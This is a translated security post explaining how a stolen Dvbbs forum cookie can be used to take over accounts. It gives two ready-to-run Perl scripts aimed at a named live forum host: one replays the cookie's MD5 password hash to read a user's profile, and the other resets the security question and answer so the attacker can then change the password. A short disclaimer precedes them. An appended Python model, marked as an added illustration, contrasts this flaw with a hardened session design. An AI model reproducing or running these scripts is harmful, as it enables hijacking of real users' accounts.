by superdao superdao@21cn.com
http://www.china4lert.org
I don't know whether everyone has read shocknet's article "A security analysis of the Dvbbs (动网先锋) ASP forum: applying cross-site scripting". In Dvbbs the password and the answer to the security question are stored as MD5 hashes, so merely obtaining the cookie is not worth much.
We can take a different approach: once we have the cookie, send one request to fetch the user's profile, then send a second request to change the user's security question and answer.
Disclaimer:
The two scripts below are provided for reference only. Do not use them for illegal purposes; you alone bear all consequences!
hiallone is a user I registered on the Dvbbs forum for testing; you can see the demonstration at:
http://enter.3322.net/cgi-bin/dongw.cgi
http://enter.3322.net/cgi-bin/dongw1.cgi
#!/usr/bin/perl
# Script 1: retrieve the user's profile
# http://enter.3322.net/cgi-bin/dongw.cgi
use Socket;
$host = "bbs.aspsky.net";
$port = 80;
$str = "";
$len =length($str);
# The stolen cookie is replayed verbatim; its password= value is the stored MD5 hash.
$req = "POST /MYMODIFY.ASP?name=hiallone HTTP/1.1\r\n".
"Host: $host\r\n".
"Accept: */*\r\n".
"Cookie: aspsky=password=965eb72c92a549dd&usercookies=0&username=hiallone&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&upNum=1;\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: $len\n\n".
"$str\n\n";
@re =sendraw($req);
print "Content-type: text/html\n\n";
print "@re";
# Open a TCP connection to $host:$port, send the raw request and
# return every line of the response.
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){   # hand-packed sockaddr_in (AF_INET = 2)
select(S);
$| = 1;            # unbuffered writes to the socket
print $req;
my @res = <S>;     # read until the server closes the connection
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
-------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
# Script 2: change the security question and answer; here we set quesion=whoami21&answer=superdao
# After that you can go and change his password, heh!
#http://enter.3322.net/cgi-bin/dongw1.cgi
use Socket;
$host = "bbs.aspsky.net";
$port = 80;
# Form body: psw= and oldanswer= carry the hashes taken from the cookie and the profile page.
$str = 'Sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=superdao&oldanswer=076d0cca420653d4&Email=o00o@800e.net&birthyear=&birthmonth=&birthday=&face=Pic%2FImage1.gif&myface=Pic%2FImage1.gif&width=22&height=22&URL=&groupname=%CE%DE%C3%C5%CE%DE%C5%C9&OICQ=&ICQ=&msn=&showRe=1&Signature=&usercookies=0&Submit=%B8%FC+%D0%C2';
$len =length($str);
$req = "POST /mymodify.asp?action=updat&username=hiallone HTTP/1.1\r\n".
"Host: $host\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n".
"Cookie: aspsky=upNum=1&password=965eb72c92a549dd&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=hiallone&usercookies=0\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\n\n".
"$str\n\n";
@re =sendraw($req);
print "Content-type: text/html\n\n";
print "@re";
# Open a TCP connection to $host:$port, send the raw request and
# return every line of the response.
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){   # hand-packed sockaddr_in (AF_INET = 2)
select(S);
$| = 1;            # unbuffered writes to the socket
print $req;
my @res = <S>;     # read until the server closes the connection
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
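What makes both scripts work is that the forum cookie carries the password's MD5 hash and the profile-update form accepts that same hash (psw=) as proof of identity, so a stolen cookie is as good as the password. The following Python model is an added illustration, not code from the original post or from Dvbbs: it contrasts that cookie-as-credential check with a hardened variant that uses an opaque server-side session id and requires the current plaintext password before the security question can be changed. The account data, the truncated-MD5 scheme and all function names are constructed assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Optional

def dvbbs_hash(password: str) -> str:
    # Constructed model of the forum's storage: a 16-hex-char truncated MD5.
    return hashlib.md5(password.encode()).hexdigest()[8:24]

# Constructed test account; only the hash of the password is stored.
USERS = {"hiallone": {"pwhash": dvbbs_hash("correct horse"),
                      "question": "pet?", "answer_hash": dvbbs_hash("rex")}}

def vulnerable_update(cookie: dict, form: dict) -> bool:
    """Weak design from the post: the cookie holds username + password hash and the
    form's psw= field is that same hash, so whoever holds the cookie passes."""
    user = USERS.get(cookie.get("username"))
    if not user or cookie.get("password") != user["pwhash"]:
        return False
    if form.get("psw") != user["pwhash"]:
        return False
    user["question"] = form["quesion"]          # field name as spelled by the forum
    user["answer_hash"] = dvbbs_hash(form["answer"])
    return True

SESSIONS: dict = {}  # opaque session id -> username, kept server side only

def login(username: str, password: str) -> Optional[str]:
    """Verify the plaintext password once and hand out a random session id (to be
    set as an HttpOnly cookie); the id is not derived from the password hash."""
    user = USERS.get(username)
    if not user or not hmac.compare_digest(dvbbs_hash(password), user["pwhash"]):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid

def hardened_update(sid: str, form: dict) -> bool:
    """Hardened: changing the security question needs a live session AND the
    current plaintext password, which neither a stolen cookie nor the hash gives."""
    username = SESSIONS.get(sid)
    if username is None:
        return False
    user = USERS[username]
    supplied = dvbbs_hash(form.get("current_password", ""))
    if not hmac.compare_digest(supplied, user["pwhash"]):
        return False
    user["question"] = form["quesion"]
    user["answer_hash"] = dvbbs_hash(form["answer"])
    return True
```

Replaying the hash into current_password fails against hardened_update because it is hashed again before comparison, which is the property the forum's psw= check lacked.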